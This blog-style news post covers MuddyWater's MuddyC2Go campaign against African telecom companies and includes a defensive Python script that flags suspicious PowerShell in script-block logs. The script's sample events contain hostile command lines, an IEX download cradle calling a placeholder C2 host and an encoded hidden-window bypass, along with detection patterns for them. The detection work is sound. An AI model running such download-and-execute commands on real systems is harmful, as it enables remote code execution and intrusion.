Iran-linked hackers targeted telecom companies across the African continent.

Iranian hackers linked to Iran’s Ministry of Intelligence and Security (MOIS) have attacked several companies in the telecommunications sector in Egypt, Sudan and Tanzania, using a command-and-control (C2) framework called MuddyC2Go. The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to the Seedworm C2 server, giving the attackers remote access to the victim’s system.

The group, also known as MuddyWater, focuses mainly on cyber espionage, has been active since 2017 and has been linked to several other attacks in the Middle East.

The intrusions, which occurred in November 2023, were found to rely on a custom keylogger and other publicly available tools, in addition to SimpleHelp and Venom Proxy. Attack chains mounted by the group have a track record of weaponizing phishing emails and known reconnaissance, lateral movement, and data collection techniques.

One of the targeted organisations had reportedly already been compromised by the same attacker in 2023, when SimpleHelp was used to launch PowerShell, install the JumpCloud remote access tool and deliver proxy software.

“The group continues to innovate and develop its toolset when required in order to keep its activity under the radar,” Symantec concluded. “The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks.”
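Symantec’s point about suspicious PowerShell use is the one practical takeaway for defenders here. Below is an added example (not from the article, Symantec or the MuddyC2Go samples) of a small triage filter over PowerShell Script Block Logging events (Windows Event ID 4104). The log lines are constructed for illustration, and the indicator list and weights are generic patterns that defenders commonly review rather than a signature for this campaign. It also decodes a `-EncodedCommand` argument and rescans the decoded text, because a cradle hidden behind base64 is invisible to a scan of the raw command line.

```python
"""
Added example: score PowerShell script-block log lines (Event ID 4104) for
commonly reviewed suspicious features. Sample events are constructed; the
indicator weights are an assumption for this example and should be tuned
against your own environment's baseline.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample events: (record id, script block text as logged by 4104).
SAMPLE_EVENTS = [
    (1, "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    (2, "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    (3, "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"),
    (4, "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate"),
    (5, "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"),
]

# Each indicator: label, compiled regex, weight (weights are assumed values).
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}"), 3),
    ("hidden_window", re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2),
    ("policy_bypass", re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass"), 2),
    ("no_profile", re.compile(r"(?i)\s-nop\b|-noprofile\b"), 1),
    ("download_cradle", re.compile(r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\s*\("), 3),
    ("invoke_expression", re.compile(r"(?i)\b(IEX|Invoke-Expression)\b"), 3),
    ("reflective_load", re.compile(r"(?i)Reflection\.Assembly\]::Load"), 3),
    ("base64_decode", re.compile(r"(?i)FromBase64String"), 2),
]

# Captures the base64 blob that follows -enc / -e / -EncodedCommand.
ENC_RE = re.compile(r"(?i)\s-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{20,})")


@dataclass
class Finding:
    record_id: int
    score: int
    labels: list = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(block: str) -> Optional[str]:
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None.
    PowerShell expects UTF-16LE here, so decoding as UTF-8 would be wrong."""
    m = ENC_RE.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(text: str):
    """Return (score, labels) for every indicator that matches `text`."""
    score, labels = 0, []
    for label, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            labels.append(label)
    return score, labels


def analyze(record_id: int, block: str) -> Finding:
    """Scan the raw block, then rescan any decoded -EncodedCommand payload."""
    score, labels = scan(block)
    decoded = decode_encoded_command(block)
    if decoded is not None:
        d_score, d_labels = scan(decoded)
        score += d_score
        labels += [f"decoded:{lbl}" for lbl in d_labels]
    return Finding(record_id, score, labels, decoded)


def triage(events, threshold: int = 4):
    """Return findings at or above `threshold`, highest score first."""
    findings = [analyze(rid, block) for rid, block in events]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score={f.score} labels={f.labels}")
        if f.decoded:
            print(f"  decoded payload: {f.decoded!r}")
```

With the constructed input, records 2, 3 and 5 exceed the threshold while the routine admin commands in records 1 and 4 score zero; record 2 gains an extra hit only because its encoded payload was decoded and rescanned. A real deployment would read 4104 events from the event log or a SIEM and tune the weights to the organisation's normal PowerShell use, since administrators legitimately use several of these switches.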

In October, an Iranian state-backed hacking group was caught spying on government, military and telecoms sectors in the Middle East. In September, telecoms operators in the Middle East were targeted with a new family of malware, which researchers dubbed HTTPSnoop.

The increase in the number of attacks is probably related to the ongoing conflict in the Gaza Strip, so the attacks may also serve as a warning to the countries neighbouring the conflict that Iran is still a major player in the region.

Finally, I think that we should expect similar attacks from Iranian groups in the future, and we should be prepared for them and have adequate defences against them. Iran, as a regional power, has a decisive role in the region and is ready and has the power to speak out about what is happening in the region.

Sources:

https://thehackernews.com/2023/12/iranian-hackers-using-muddyc2go-in-new.html

https://therecord.media/muddywater-cyber-espionage-africa-telecoms-iran

https://cyberpedia.medium.com/covert-cyber-operations-iranian-hackers-employ-muddyc2go-in-targeted-telecom-espionage-campaigns-bec208e837c5
